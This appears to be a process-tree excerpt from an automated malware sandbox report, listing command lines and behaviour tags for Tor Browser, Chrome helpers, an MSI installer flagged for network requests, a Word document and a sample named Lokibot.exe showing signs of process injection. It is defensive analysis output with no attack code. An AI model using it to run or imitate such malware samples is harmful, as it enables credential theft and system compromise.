C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-13.0.15.exe"C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-13.0.15.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:3864 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1184 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1392 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.0.622880453\128010337" -parentBuildID 20240510150000 -prefsHandle 2092 -prefMapHandle 2064 -prefsLen 19248 -prefMapSize 243824 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {38a5b149-bc7c-486c-9f70-47c1a0f1b366} 1392 gpu5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4116 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.1.614942829\1548208988" -childID 1 -isForBrowser -prefsHandle 2744 -prefMapHandle 2760 -prefsLen 20081 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {086f95ce-70f3-46dc-bdf9-1b6b586e590f} 1392 tab5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1116 -
C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe" --defaults-torrc "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc-defaults" -f "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc" DataDirectory "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor" ClientOnionAuthDir "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\onion-auth" GeoIPFile "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip" GeoIPv6File "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip6" +__ControlPort 127.0.0.1:9151 HashedControlPassword 16:785fc6d0f6ba741e60cfc3311dd7fc7f0e73ecfb2a351e2e3e5c748a96 +__SocksPort "127.0.0.1:9150 ExtendedErrors IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess 1392 DisableNetwork 15⤵
- Executes dropped EXE
PID:1784 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.2.1396928610\2125970775" -childID 2 -isForBrowser -prefsHandle 3412 -prefMapHandle 3408 -prefsLen 20899 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {fffaafad-9775-43a9-b61d-a5a7f1dc6d5d} 1392 tab5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2472 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.3.179777915\857124771" -childID 3 -isForBrowser -prefsHandle 3312 -prefMapHandle 3328 -prefsLen 20976 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {2be84262-e0f5-405f-9f07-3a8549dc0638} 1392 tab5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3672 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.4.1739778790\1335335097" -parentBuildID 20240510150000 -prefsHandle 3728 -prefMapHandle 3328 -prefsLen 22215 -prefMapSize 243824 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {021463af-a52c-48ea-805b-54c7be79ec0e} 1392 rdd5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5044 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.5.1623867219\1682794932" -childID 4 -isForBrowser -prefsHandle 4104 -prefMapHandle 4100 -prefsLen 22396 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {8100e405-4aad-41fe-8d9e-77a985825baf} 1392 tab5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1660 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.6.1788414678\737292336" -childID 5 -isForBrowser -prefsHandle 4248 -prefMapHandle 4256 -prefsLen 22396 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {51610cbb-03bf-423e-aec6-50869afc515f} 1392 tab5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3860 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.7.439161912\2044188143" -childID 6 -isForBrowser -prefsHandle 4372 -prefMapHandle 4360 -prefsLen 22396 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ce637bf9-1dee-49e3-b37a-924b8f85f570} 1392 tab5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1944 -
C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\PluggableTransports\lyrebird.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\PluggableTransports\lyrebird.exe"5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:5500 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.8.28129042\639231709" -childID 7 -isForBrowser -prefsHandle 3896 -prefMapHandle 3876 -prefsLen 23084 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {a10cde01-de24-4736-bfe1-44908c9b2f47} 1392 tab5⤵
- Executes dropped EXE
PID:3908 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.9.1785135990\1910091475" -childID 8 -isForBrowser -prefsHandle 4676 -prefMapHandle 4992 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {09d1ba46-6947-4a1c-ab2a-119662ab8c59} 1392 tab5⤵
- Executes dropped EXE
PID:4184 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.10.1571063285\781352987" -childID 9 -isForBrowser -prefsHandle 4292 -prefMapHandle 4308 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {383d41c4-a66d-4084-a721-07b0885f4d24} 1392 tab5⤵
- Executes dropped EXE
PID:5556 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.11.1784158830\1386819180" -childID 10 -isForBrowser -prefsHandle 4348 -prefMapHandle 4976 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {549d3736-7f4f-486a-abeb-96a7580ba758} 1392 tab5⤵
- Executes dropped EXE
PID:5204 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.12.602653644\55381638" -childID 11 -isForBrowser -prefsHandle 5196 -prefMapHandle 5104 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {522d7100-a7ae-4e7c-a79a-1641c7f7fa0f} 1392 tab5⤵
- Executes dropped EXE
PID:5072 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.13.12357411\1645925455" -childID 12 -isForBrowser -prefsHandle 5428 -prefMapHandle 5456 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {975a07d3-d670-42c3-ba80-07e16b0e5904} 1392 tab5⤵
- Executes dropped EXE
PID:1824 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.14.361288624\839719787" -childID 13 -isForBrowser -prefsHandle 4444 -prefMapHandle 1932 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {a80e88eb-1a79-40a7-9079-dd271aaeb970} 1392 tab5⤵
- Executes dropped EXE
PID:6008 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.15.961789321\977620180" -parentBuildID 20240510150000 -sandboxingKind 1 -prefsHandle 5712 -prefMapHandle 5716 -prefsLen 25283 -prefMapSize 243824 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {51467e3e-c435-4e64-821c-2e19601ff673} 1392 utility5⤵
- Executes dropped EXE
PID:5428 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.16.493970024\953957208" -childID 14 -isForBrowser -prefsHandle 5956 -prefMapHandle 5972 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {bcc244ec-9182-4631-a6ea-8f0c741a6d6c} 1392 tab5⤵
- Executes dropped EXE
PID:5108 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.17.434641906\1818172257" -childID 15 -isForBrowser -prefsHandle 9808 -prefMapHandle 4132 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {b205ce04-df36-4dda-bd6a-89f908ab91af} 1392 tab5⤵
- Executes dropped EXE
PID:5644 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.18.130841608\1163909127" -childID 16 -isForBrowser -prefsHandle 4560 -prefMapHandle 9724 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ee1e5ad0-a5cc-44b1-b414-a8dc05c8a484} 1392 tab5⤵
- Executes dropped EXE
PID:3088 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.19.891700938\181589749" -childID 17 -isForBrowser -prefsHandle 5380 -prefMapHandle 5328 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {16e4b8c0-07db-430f-aa97-23bf46dbf79d} 1392 tab5⤵
- Executes dropped EXE
PID:332 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.20.1487296909\1257509143" -childID 18 -isForBrowser -prefsHandle 9764 -prefMapHandle 9760 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {d8d5c98e-ea56-4ed1-9270-266b36e7ae15} 1392 tab5⤵
- Executes dropped EXE
PID:5996 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.21.2015612201\332560435" -childID 19 -isForBrowser -prefsHandle 4180 -prefMapHandle 4164 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {508b0b62-29d2-471d-b69c-aaac7495cc2a} 1392 tab5⤵
- Executes dropped EXE
PID:5868 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.22.476579844\1718346386" -childID 20 -isForBrowser -prefsHandle 4340 -prefMapHandle 3876 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ca03cacd-43c5-4902-aeee-aa714d767340} 1392 tab5⤵
- Executes dropped EXE
PID:3492 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.23.844845881\1860038382" -childID 21 -isForBrowser -prefsHandle 5980 -prefMapHandle 4136 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {7f950dd4-4815-4f47-8d18-b3548778f22a} 1392 tab5⤵
- Executes dropped EXE
PID:2216 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.24.919850134\400484147" -childID 22 -isForBrowser -prefsHandle 5444 -prefMapHandle 5524 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {20682dc7-0531-455b-b258-4ef4c0043b79} 1392 tab5⤵
- Executes dropped EXE
PID:1744 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.25.166533848\74661245" -childID 23 -isForBrowser -prefsHandle 5968 -prefMapHandle 4344 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {1324f84d-74b1-4d7d-bc89-602cb12fc23a} 1392 tab5⤵
- Executes dropped EXE
PID:6136 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="1392.26.1783326982\145569928" -childID 24 -isForBrowser -prefsHandle 5236 -prefMapHandle 3760 -prefsLen 23290 -prefMapSize 243824 -jsInitHandle 1204 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {dae3f8fd-54c1-40dc-83e5-21e9bfedcf1d} 1392 tab5⤵
- Executes dropped EXE
PID:4132 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=5720 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:3872
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=1920 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:5816
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:968
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:4900
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3180 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:2888
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1116 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:5908
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=5368 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:5220
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5532 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:1972
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:4352
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=3924 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:5976
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=4692 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:6068
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3292 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:60
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5524 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:3416
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=4456 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:4972
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=4920 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:2796
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=5728 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:4992
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=400 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:792
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5384 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:4964
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4064 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:2108
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=5880 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:4496
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=5332 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:5232
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4772 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:3904
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\BabylonClient12.msi"2⤵
- Blocklisted process makes network request
- Enumerates connected drives
PID:4676 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3320 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:5012
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\metrofax.doc" /o ""2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
PID:756 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122883⤵PID:6060
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5900 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:472
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3112 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:5836
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4332 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:5972
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3320 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:1096
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2848 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:5744
-
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5884 -
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"3⤵PID:4684
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5604 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:3312
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4876 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:5924
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:5760
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5904 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:4884
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3304 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:1196
-
